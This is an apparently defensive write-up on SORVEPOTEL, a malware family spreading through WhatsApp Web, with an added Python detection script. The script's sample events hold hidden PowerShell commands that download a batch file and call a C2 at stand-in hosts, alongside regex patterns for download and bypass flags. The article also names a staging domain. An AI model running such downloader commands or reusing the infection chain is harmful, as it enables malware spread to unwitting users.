SORVEPOTEL Malware

A fast-moving malware campaign named SORVEPOTEL is actively exploiting the trust people place in WhatsApp to propagate itself across Windows environments. Unlike many modern attacks built for data theft or ransomware, this campaign is optimized for speedy, large-scale spread — which makes it particularly dangerous in enterprise contexts where a single compromised desktop can seed many more infections.

What Is SORVEPOTEL

SORVEPOTEL is a self‑propagating Windows malware family that leverages social engineering and the desktop/web version of WhatsApp to distribute malicious attachments to a victim’s contacts and groups. Its primary objective appears to be rapid dissemination and account abuse (resulting in spam and account bans), not immediate data exfiltration or file encryption.

How Victims Are Lured

Attackers begin from a compromised WhatsApp contact or, in some cases, with a seemingly legitimate email. The message contains a ZIP file disguised as an innocuous item (for example, a receipt or health-app file). If the recipient opens the ZIP on a desktop, the following steps typically occur:

  • The victim is tricked into launching a Windows shortcut (LNK) inside the archive.
  • The LNK silently runs a PowerShell command that downloads the next-stage payload from an external host (an identified example is sorvetenopoate.com).

The retrieved payload is a batch script that establishes persistence and executes further commands.

Execution Details And Persistence Mechanisms

Once installed, the batch script copies itself into the Windows Startup folder so it will run automatically after system boot. It also invokes PowerShell to contact a Command‑and‑Control (C2) server for follow‑up instructions or to fetch additional components. These behaviors enable the malware to remain resident and to accept remote commands from the operators.
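As an added illustration, not code from the original page or from the analysts who documented SORVEPOTEL, the Python below sketches detection logic for the chain described in the two sections above (a PowerShell downloader launched from a shortcut, a batch script run from the Startup folder, and that script calling out through PowerShell), applied to constructed process-creation records. The field names, user paths and `.invalid` hosts are assumptions, not observed indicators.

```python
import re

# Constructed process-creation records with hypothetical field names; they are
# not real EDR/Sysmon output, only shaped after the chain described above.
SAMPLE_EVENTS = [
    # 1. user opens the LNK: explorer.exe launches the embedded PowerShell downloader
    {"parent_image": r"C:\Windows\explorer.exe", "parent_cmd": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -ep bypass -c "iwr http://stage.invalid/p.bat -OutFile $env:TEMP\p.bat"'},
    # 2. next logon: explorer.exe runs the batch script copied into the Startup folder
    {"parent_image": r"C:\Windows\explorer.exe", "parent_cmd": "explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p.bat"'},
    # 3. the batch script calls PowerShell to reach the C2
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmd": r'cmd.exe /c "C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p.bat"',
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://c2.invalid/t')\""},
    # 4. benign admin PowerShell started from a shortcut; must not fire
    {"parent_image": r"C:\Windows\explorer.exe", "parent_cmd": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Projects"},
]

STARTUP_SCRIPT = re.compile(r"\\start menu\\programs\\startup\\[^\"']+\.(?:bat|cmd)", re.I)
DOWNLOAD_VERB = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
STEALTH_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.I)

def is_powershell(image):
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def classify(ev):
    """Return the detection reasons that apply to one event; an empty list means no match."""
    reasons = []
    downloads = DOWNLOAD_VERB.search(ev["cmd"]) is not None
    if is_powershell(ev["image"]) and downloads:
        if ev["parent_image"].lower().endswith("\\explorer.exe"):
            reasons.append("explorer.exe (shortcut-style launch) spawned a PowerShell downloader")
        if STARTUP_SCRIPT.search(ev["parent_cmd"]):
            reasons.append("Startup-folder batch script spawned a PowerShell downloader")
        if STEALTH_FLAG.search(ev["cmd"]):
            reasons.append("PowerShell run hidden or with execution policy bypassed")
    if ev["image"].lower().endswith("\\cmd.exe") and STARTUP_SCRIPT.search(ev["cmd"]):
        reasons.append("batch script executing from the Startup folder (persistence)")
    return reasons

def scan(events):
    """Map event index -> reasons for every event that triggered at least one rule."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(reasons))
```

A batch file in the Startup folder is not malicious on its own, so the last rule is a review trigger rather than a verdict; the parent/child rules on the PowerShell downloader are the ones that tie events to this chain.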

WhatsApp As The Propagation Engine

A core feature of SORVEPOTEL is its WhatsApp-aware spreading routine. If the malware detects that WhatsApp Web (the desktop/web client) is active on the infected machine, it automates the distribution of the same malicious ZIP to:

  • All contacts linked to the compromised account, and
  • All groups the account belongs to.

This automated distribution produces a very high volume of outbound spam, which often triggers WhatsApp’s abuse detection and leads to suspended or banned accounts.

Scope And Who’s Been Hit

The campaign so far is heavily concentrated in Brazil: 457 of 477 recorded infections originated there. Targeted organizations span several sectors, notably:

  • government and public services
  • manufacturing
  • technology
  • education
  • construction

Notably, the operators do not appear to have used the access they gained for mass data theft or to deploy ransomware; the observable outcome has been aggressive propagation and account abuse.

Additional Distribution Vectors Observed

Although WhatsApp-based messages are the primary propagation route, analysts have found evidence that attackers also distribute the same malicious ZIP attachments via email, sometimes using apparently legitimate sender addresses to increase credibility.

Why This Campaign Is Notable

SORVEPOTEL illustrates a trend where attackers exploit mainstream communication platforms to multiply reach with minimal user interaction. By weaponizing a trusted contact and the convenience of WhatsApp Web, the malware achieves rapid lateral propagation across organizations without needing sophisticated data-theft components.

Closing Note

SORVEPOTEL is a reminder that social platforms are attractive propagation channels for malware. Rapid detection, user education, and controls that limit script execution and monitor messaging clients on desktops will materially reduce the attack surface this campaign exploits.